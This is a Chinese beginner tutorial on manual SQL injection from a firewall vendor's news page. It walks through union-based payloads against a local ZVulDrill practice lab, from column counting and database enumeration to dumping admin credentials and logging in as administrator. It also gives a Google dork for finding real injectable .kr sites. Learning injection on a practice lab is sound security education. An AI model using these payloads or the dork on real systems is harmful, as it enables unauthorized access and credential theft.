English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 威盾新闻 >> 手动sql注入(初级篇)
 

手动sql注入(初级篇)

威盾防火墙 2014-12-12
 

我也是才学 sql 注入一个星期,此篇文章是学给初学者看的

推荐书籍 《sql注入攻击与防御》http://www.ddooo.com/softdown/50160.htm

1、找到存在sql注入的网站

  方法:在google中输入 site:kr inurl:php?id=
    打开出现的网址,在网址后面添加 ’  (英文逗号)如果页面出现跳转 说明可能存在sql注入
原理:一般网址都是类似  search.php?search=hello
   相应的sql语句 可能是 select * from table_name where column_name='hello'
   如果在网址后面添加 ‘   则sql语句为  select * from table_name where column_name='hello'’
   如果网站没有进行sql注入过滤,会报错
在GitHub有个Web漏洞演练项目,可以下载后部署在自己的电脑上(这里我就不教大家部署了,熟悉Web编程的大部分都会)
网页内容如下

2、检测字段长度

(1) http://localhost/ZVulDrill-master/search.php?search=hello%' order by 1--%20
相当于sql语句 select * from table_name where colmun_name like '%hello%' order by 1 -- '
说明 MySQL有三种注释 -- 是其中一种 但是 -- 后面要跟一个空格才有效 但是网址会自动去掉最后一个空格需要手动输入%20
注释后面的sql语句不执行
(2)  此时页面没有出错,用同样的方式 添加 order by 10
页面出错,然后 order by 5 出错,order by 4 页面正确
 说明字段长  4

3、查看数据库信息

      方法:使用union语句提取数据  
    (1)   http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,2,4 --%20
sql语句  select * from table_name where column_name like '%hello%' and 1=2 union select 1,2,3,4
union前的sql语句中 where条件恒为假,结果集为空,整个sql语句返回的是union后面的结果集

    (2)  获取MySQL version user database 等相关信息
   如上图所示,页面上显示 1,2 ,可以利用这个来显示我们需要的信息
 http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,version(),user(),4 --%20
  即  将 2,3 换成 version(),user()
  页面如下

同理将 user() 换成 database()  得到数据库名  zvuldrill
user() ------------    wkdty@localhost
version()  --------------   5.6.17 (5.0以上的版本都带有一个 information_schema 的虚拟库里面存放的是所有库的信息.)
 database()   -------------  zvuldrill

4、获取数据库数据

  (1)获取表名
http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT table_name),4 from information_schema.columns where table_schema='zvuldrill'--%20

数据库中有3张表,对我们最有用的是admin这张表,以管理员身份进入网站可以看到各种信息
(2)获取字段名
http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT column_name),4 from information_schema.columns where table_name='admin'--%20


(3)获取数据
http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT admin_id,admin_name,admin_pass),4 from admin--%20


  admin_id 1 
admin_name admin
admin_pass d033e22ae348aeb5660fc2140aec35850c4da997   (md5解密之后  得到admin)
根据用户登录入口,找到后台登录入口  ,以管理员身份进入网站
相关内容: 最新内容:
如何防止存储过程拼接字符串的sql注入问题[2014-12-12]
五种提高 SQL 性能的方法[2014-12-12]
Sql Server存储过程编写经验和优化措[2014-12-12]
SQL Server应用程序中的高级SQL注入(2)[2014-12-12]
如何进行防SQL注入?[2014-12-11]
SQL注入漏洞入侵的过程及其防范措施[2014-12-10]
 如何防止存储过程拼接字符串的sql注入问题[2014-12-12]
vs2005操作word2003![2014-12-12]
服务器(WIndows2003)部署asp.net网站生成word文档经常遇到的问题![2014-12-12]
NET1.1下,使用C#自动生成Word2003文档(通过操作COM组件实现)[2014-12-12]
Ajax错误处理机制技术探讨[2014-12-12]
VS2005网站发布不便问题讨论[2014-12-12]